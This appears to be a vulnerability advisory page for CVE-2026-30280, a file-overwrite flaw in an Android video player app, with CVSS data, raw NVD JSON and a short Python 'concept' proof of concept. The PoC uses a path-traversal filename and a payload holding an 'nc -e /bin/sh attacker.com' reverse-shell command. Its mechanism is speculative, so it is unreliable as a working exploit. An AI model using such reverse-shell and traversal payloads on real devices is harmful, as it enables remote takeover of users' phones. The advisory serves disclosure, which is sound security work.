Security Vulnerability Report
CVE-2026-30280 CVSS 5.3 MEDIUM

CVE-2026-30280

Published: 2026-03-31 20:16:26
Last Modified: 2026-04-02 20:44:45

Description

An arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:rareprob:video_player:1.0.135:*:*:*:*:android:*:* - VULNERABLE
Video player Play All Videos 1.0.135

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os

# PoC Concept for Arbitrary File Overwrite
# This script demonstrates how to craft a file intended to overwrite a critical config.

# Target file path (Path Traversal)
# Assuming the app runs in a sandboxed environment but fails to sanitize paths.
# Example target: shared_prefs or a library file.
malicious_filename = "../../data/data/com.rareprob.playall/files/malicious_config.xml"

# Malicious content to be written
payload = "<config><execute>system('nc -e /bin/sh attacker.com 4444')</execute></config>"

# Simulating the file creation process that would occur before import
print(f"[*] Creating malicious file: {malicious_filename}")
print(f"[*] Payload content prepared: {payload}")

# In a real attack scenario:
# 1. The attacker places this file in a location the app can read (e.g., Downloads).
# 2. The attacker tricks the user into using the 'Import' feature of the app.
# 3. The app reads the filename without sanitization and overwrites the target file.
print("[!] If imported by the vulnerable app, critical files will be overwritten.")

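References

https://github.com/Secsys-FDU/AF_CVEs/issues/29 (Exploit, Third Party Advisory, Issue Tracking)
https://rareprob-website.firebaseapp.com/ (Product)
https://secsys.fudan.edu.cn/ (Not Applicable)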

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30280", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:26.420", "lastModified": "2026-04-02T20:44:44.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 allows attackers to overwrite critical internal files via the file import process, leading to arbtrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rareprob:video_player:1.0.135:*:*:*:*:android:*:*", "matchCriteriaId": "A0CA20CD-4D19-4C08-9EDB-A6B44EC34705"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/29", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}, {"url": "https://rareprob-website.firebaseapp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}